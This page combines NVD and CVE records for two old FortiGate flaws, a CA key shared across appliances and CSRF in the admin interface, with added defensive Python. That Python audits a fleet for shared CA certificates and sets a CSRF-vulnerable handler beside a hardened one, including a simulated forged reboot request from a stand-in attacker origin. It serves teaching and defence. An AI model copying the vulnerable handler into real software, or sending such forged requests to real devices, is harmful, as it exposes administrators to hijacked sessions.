"CE424B2A-3299-496F-9778-04D0792BC0D5", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-5101c:-:*:*:*:*:*:*:*", "matchCriteriaId": "59C78680-88A9-4AB0-9FE9-333690A9B66A", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-5140b:-:*:*:*:*:*:*:*", "matchCriteriaId": "7AA3538A-5B71-4939-8A2A-93678E6EB1D3", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-600c:-:*:*:*:*:*:*:*", "matchCriteriaId": "7A73FA2A-1852-4AE0-A892-9B0B06705324", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-60c:-:*:*:*:*:*:*:*", "matchCriteriaId": "1F72F3FE-DC85-4605-B416-4FE31F90A06A", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-620b:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D4BC042-D692-477E-A790-7BECF4B210A6", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-800c:-:*:*:*:*:*:*:*", "matchCriteriaId": "6EB09BD9-6853-40D6-BDA7-749D87335E4F", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-80c:-:*:*:*:*:*:*:*", "matchCriteriaId": 
"113E1146-572A-466A-AB34-145081F842B4", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigate-voice-80c:-:*:*:*:*:*:*:*", "matchCriteriaId": "BF418899-1667-4428-B8E8-E4E29D634DDC", "vulnerable": true }, { "criteria": "cpe:2.3:h:fortinet:fortigaterugged-100c:-:*:*:*:*:*:*:*", "matchCriteriaId": "9C24DF92-D24B-43D1-8623-17F3F90F29D0", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "The default configuration of Fortinet Fortigate UTM appliances uses the same Certification Authority certificate and same private key across different customers\u0027 installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging the presence of the Fortinet_CA_SSLProxy certificate in a list of trusted root certification authorities." }, { "lang": "es", "value": "La configuraci\u00f3n predeterminada de Fortinet FortiGate UTM utiliza el mismo certificado de la autoridad de certificaci\u00f3n (CA) y la misma clave privada en instalaciones de diferentes clientes, lo que hace que sea m\u00e1s f\u00e1cil para atacantes MITM (man-in-the-middle) a la hora de falsificar servidores SSL, aprovechando la presencia del certificado Fortinet_CA_SSLProxy en una lista de confianza de la autoridad de certificaci\u00f3n ra\u00edz.\r\n" } ], "id": "CVE-2012-4948", "lastModified": "2024-11-21T01:43:48.363", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "HIGH", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "vectorString": "AV:A/AC:H/Au:N/C:C/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 3.2, "impactScore": 7.8, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } 
] }, "published": "2012-11-14T12:30:59.507", "references": [ { "source": "cret@cert.org", "url": "http://osvdb.org/87048" }, { "source": "cret@cert.org", "tags": [ "Third Party Advisory", "US Government Resource" ], "url": "http://www.kb.cert.org/vuls/id/111708" }, { "source": "cret@cert.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/56382" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "http://osvdb.org/87048" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "US Government Resource" ], "url": "http://www.kb.cert.org/vuls/id/111708" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/56382" } ], "sourceIdentifier": "cret@cert.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-295" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
cve-2012-4948
Vulnerability from cvelistv5
URL | Tags
---|---
http://www.kb.cert.org/vuls/id/111708 | third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/56382 | vdb-entry, x_refsource_BID
http://osvdb.org/87048 | vdb-entry, x_refsource_OSVDB
```json
{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T20:50:18.189Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {"name": "VU#111708", "tags": ["third-party-advisory", "x_refsource_CERT-VN", "x_transferred"], "url": "http://www.kb.cert.org/vuls/id/111708"},
          {"name": "56382", "tags": ["vdb-entry", "x_refsource_BID", "x_transferred"], "url": "http://www.securityfocus.com/bid/56382"},
          {"name": "87048", "tags": ["vdb-entry", "x_refsource_OSVDB", "x_transferred"], "url": "http://osvdb.org/87048"}
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {"product": "n/a", "vendor": "n/a", "versions": [{"status": "affected", "version": "n/a"}]}
      ],
      "datePublic": "2012-10-22T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The default configuration of Fortinet Fortigate UTM appliances uses the same Certification Authority certificate and same private key across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging the presence of the Fortinet_CA_SSLProxy certificate in a list of trusted root certification authorities."
        }
      ],
      "problemTypes": [
        {"descriptions": [{"description": "n/a", "lang": "en", "type": "text"}]}
      ],
      "providerMetadata": {
        "dateUpdated": "2013-02-26T10:00:00",
        "orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
        "shortName": "certcc"
      },
      "references": [
        {"name": "VU#111708", "tags": ["third-party-advisory", "x_refsource_CERT-VN"], "url": "http://www.kb.cert.org/vuls/id/111708"},
        {"name": "56382", "tags": ["vdb-entry", "x_refsource_BID"], "url": "http://www.securityfocus.com/bid/56382"},
        {"name": "87048", "tags": ["vdb-entry", "x_refsource_OSVDB"], "url": "http://osvdb.org/87048"}
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {"ASSIGNER": "cert@cert.org", "ID": "CVE-2012-4948", "STATE": "PUBLIC"},
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {"product_data": [{"product_name": "n/a", "version": {"version_data": [{"version_value": "n/a"}]}}]},
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The default configuration of Fortinet Fortigate UTM appliances uses the same Certification Authority certificate and same private key across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging the presence of the Fortinet_CA_SSLProxy certificate in a list of trusted root certification authorities."
            }
          ]
        },
        "problemtype": {"problemtype_data": [{"description": [{"lang": "eng", "value": "n/a"}]}]},
        "references": {
          "reference_data": [
            {"name": "VU#111708", "refsource": "CERT-VN", "url": "http://www.kb.cert.org/vuls/id/111708"},
            {"name": "56382", "refsource": "BID", "url": "http://www.securityfocus.com/bid/56382"},
            {"name": "87048", "refsource": "OSVDB", "url": "http://osvdb.org/87048"}
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
    "assignerShortName": "certcc",
    "cveId": "CVE-2012-4948",
    "datePublished": "2012-11-14T11:00:00",
    "dateReserved": "2012-09-17T00:00:00",
    "dateUpdated": "2024-08-06T20:50:18.189Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}
```
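The condition CVE-2012-4948 describes, one CA certificate and therefore one private key present on many customers' appliances, can be checked for in your own fleet by comparing the SSL-inspection CA each device presents. The script below is an added example and is not Fortinet code or part of the CVE record; the device names and the PEM bodies are constructed placeholders standing in for real DER, and the functions work unchanged on real exported certificates.

```python
"""Added example (not Fortinet code): audit SSL-inspection CA certificates
across a fleet for one certificate, and so one key, shared by several devices,
then check a client trust store for that same CA. Sample data is constructed."""
import base64
import hashlib
import re
from collections import defaultdict

PEM_BLOCK = re.compile(r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)


def pem_to_der(pem: str) -> bytes:
    """Return the DER bytes of the first certificate in a PEM string."""
    m = PEM_BLOCK.search(pem)
    if not m:
        raise ValueError("no CERTIFICATE block found")
    return base64.b64decode("".join(m.group(1).split()), validate=True)


def fingerprint(der: bytes) -> str:
    """SHA-256 over the DER, the value `openssl x509 -fingerprint -sha256`
    prints, without the colons."""
    return hashlib.sha256(der).hexdigest()


def shared_ca_certs(device_to_pem: dict) -> dict:
    """Map each fingerprint presented by more than one device to those devices.
    An identical CA certificate means an identical private key, so any one
    device in a group can mint certificates that the others' clients trust."""
    by_fp = defaultdict(list)
    for device, pem in sorted(device_to_pem.items()):
        by_fp[fingerprint(pem_to_der(pem))].append(device)
    return {fp: devs for fp, devs in by_fp.items() if len(devs) > 1}


def trust_store_hits(store_pem: str, bad_fingerprints: set) -> list:
    """Fingerprints in a client PEM bundle that match a CA known to be shared;
    these are the roots to remove from end-user machines."""
    hits = []
    for m in PEM_BLOCK.finditer(store_pem):
        fp = fingerprint(base64.b64decode("".join(m.group(1).split()), validate=True))
        if fp in bad_fingerprints:
            hits.append(fp)
    return hits


def _pem(body: bytes) -> str:
    """Wrap constructed bytes as a PEM block; a stand-in for real DER here."""
    return ("-----BEGIN CERTIFICATE-----\n" + base64.b64encode(body).decode()
            + "\n-----END CERTIFICATE-----\n")


# Constructed fleet: two branches still run the factory CA, HQ re-issued its own.
FACTORY_CA = _pem(b"placeholder DER for the factory-default SSL proxy CA")
SITE_CA = _pem(b"placeholder DER for a CA generated on one appliance")
FLEET = {"fw-branch-1": FACTORY_CA, "fw-branch-2": FACTORY_CA, "fw-hq": SITE_CA}
# Constructed client bundle holding the factory CA plus an unrelated root.
CLIENT_STORE = FACTORY_CA + _pem(b"placeholder DER for some public root")


def demo() -> dict:
    shared = shared_ca_certs(FLEET)
    return {"shared": shared, "client_hits": trust_store_hits(CLIENT_STORE, set(shared))}


if __name__ == "__main__":
    for fp, devices in demo()["shared"].items():
        print(f"shared CA {fp[:16]}... on {', '.join(devices)}")
```

An identical fingerprint is sufficient to show a shared key, which is what the factory-default certificate produces. It is not necessary: a certificate re-issued over the same key would have a different fingerprint, and catching that requires comparing SubjectPublicKeyInfo hashes (for example from `openssl x509 -pubkey -noout`), which this script does not do.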
cve-2013-1414
Vulnerability from cvelistv5
| URL | Tags |
|---|---|
| http://www.exploit-db.com/exploits/26528/ | exploit, x_refsource_EXPLOIT-DB |
```json
{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T14:57:05.156Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {"name": "26528", "tags": ["exploit", "x_refsource_EXPLOIT-DB", "x_transferred"], "url": "http://www.exploit-db.com/exploits/26528/"}
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {"product": "n/a", "vendor": "n/a", "versions": [{"status": "affected", "version": "n/a"}]}
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown."
        }
      ],
      "problemTypes": [
        {"descriptions": [{"description": "n/a", "lang": "en", "type": "text"}]}
      ],
      "providerMetadata": {
        "dateUpdated": "2013-07-08T17:00:00Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {"name": "26528", "tags": ["exploit", "x_refsource_EXPLOIT-DB"], "url": "http://www.exploit-db.com/exploits/26528/"}
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {"ASSIGNER": "cve@mitre.org", "ID": "CVE-2013-1414", "STATE": "PUBLIC"},
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {"product_data": [{"product_name": "n/a", "version": {"version_data": [{"version_value": "n/a"}]}}]},
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown."
            }
          ]
        },
        "problemtype": {"problemtype_data": [{"description": [{"lang": "eng", "value": "n/a"}]}]},
        "references": {
          "reference_data": [
            {"name": "26528", "refsource": "EXPLOIT-DB", "url": "http://www.exploit-db.com/exploits/26528/"}
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-1414",
    "datePublished": "2013-07-08T17:00:00Z",
    "dateReserved": "2013-01-24T00:00:00Z",
    "dateUpdated": "2024-09-16T20:16:50.095Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}
```
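The record above says the FortiOS admin interface accepted state-changing requests, including the rebootme action on system/maintenance/shutdown, on the strength of the administrator's session cookie alone, which is exactly what a browser attaches to a form post from any page the administrator happens to visit. The model below is an added example, not FortiOS code or the exploit-db PoC: it puts a handler with that behaviour beside a hardened one that requires POST, a same-origin Origin or Referer header, and a per-session token bound to the action path. The cookie name, form field names and management address are assumptions for illustration.

```python
"""Added example (not FortiOS code): a minimal admin action handler open to
CSRF, beside a hardened version. Cookie name, field names and the management
address are assumptions; only the path and the rebootme action come from the CVE."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

ADMIN_ORIGIN = "https://192.0.2.1"          # assumed management address (RFC 5737 range)
SHUTDOWN_PATH = "/system/maintenance/shutdown"


@dataclass
class Session:
    admin: str
    csrf_secret: bytes = field(default_factory=lambda: secrets.token_bytes(32))


@dataclass
class Request:
    method: str
    path: str
    cookies: dict
    form: dict
    headers: dict


SESSIONS: dict = {}                          # constructed store: session id -> Session


def login(admin: str) -> str:
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = Session(admin)
    return sid


def session_for(req: Request):
    return SESSIONS.get(req.cookies.get("session", ""))   # assumed cookie name


def do_reboot(req: Request) -> str:
    if req.path == SHUTDOWN_PATH and req.form.get("action") == "rebootme":
        return "200 rebooting"
    return "400 bad request"


def vulnerable_shutdown(req: Request) -> str:
    """Pre-fix behaviour: the session cookie is the only check. A hidden
    auto-submitting form on an attacker's page carries that cookie, so merely
    visiting the page while logged in reboots the firewall."""
    if session_for(req) is None:
        return "401 login required"
    return do_reboot(req)


def csrf_token(sess: Session, path: str) -> str:
    """Synchronizer token: per-session secret, bound to the action path so a
    token harvested from one page cannot be replayed against another."""
    return hmac.new(sess.csrf_secret, path.encode(), hashlib.sha256).hexdigest()


def same_origin(value: str) -> bool:
    """Exact scheme://host[:port] match; a prefix test would let
    https://192.0.2.10 pass for https://192.0.2.1."""
    p = urlsplit(value)
    return f"{p.scheme}://{p.netloc}" == ADMIN_ORIGIN


def hardened_shutdown(req: Request) -> str:
    """Post-fix behaviour: POST only, same-origin header, valid token. The
    attacker's page can send the cookie but cannot read the token."""
    sess = session_for(req)
    if sess is None:
        return "401 login required"
    if req.method != "POST":
        return "405 state change requires POST"
    origin = req.headers.get("Origin") or req.headers.get("Referer") or ""
    if not same_origin(origin):               # a missing header fails closed
        return "403 cross-origin request rejected"
    if not hmac.compare_digest(csrf_token(sess, req.path), req.form.get("csrf_token", "")):
        return "403 missing or invalid CSRF token"
    return do_reboot(req)


def demo() -> dict:
    """Forged, legitimate, replayed-token and GET requests through both handlers."""
    sid = login("admin")
    cookies = {"session": sid}
    forged = Request("POST", SHUTDOWN_PATH, cookies, {"action": "rebootme"},
                     {"Origin": "https://attacker.example"})
    good_form = {"action": "rebootme", "csrf_token": csrf_token(SESSIONS[sid], SHUTDOWN_PATH)}
    legit = Request("POST", SHUTDOWN_PATH, cookies, good_form, {"Origin": ADMIN_ORIGIN})
    replay_form = {"action": "rebootme", "csrf_token": csrf_token(SESSIONS[sid], "/system/settings")}
    replay = Request("POST", SHUTDOWN_PATH, cookies, replay_form, {"Origin": ADMIN_ORIGIN})
    via_get = Request("GET", SHUTDOWN_PATH, cookies, good_form, {"Origin": ADMIN_ORIGIN})
    return {
        "vulnerable_forged": vulnerable_shutdown(forged),
        "hardened_forged": hardened_shutdown(forged),
        "hardened_legit": hardened_shutdown(legit),
        "hardened_replay": hardened_shutdown(replay),
        "hardened_get": hardened_shutdown(via_get),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The Origin check alone is not enough, because the header is absent on some legitimate navigations and some proxies strip Referer; the token is the primary control and the header check is defence in depth. Marking the session cookie SameSite=Lax or Strict, which browsers did not support in 2013, would today stop the cross-site post before it reached either handler.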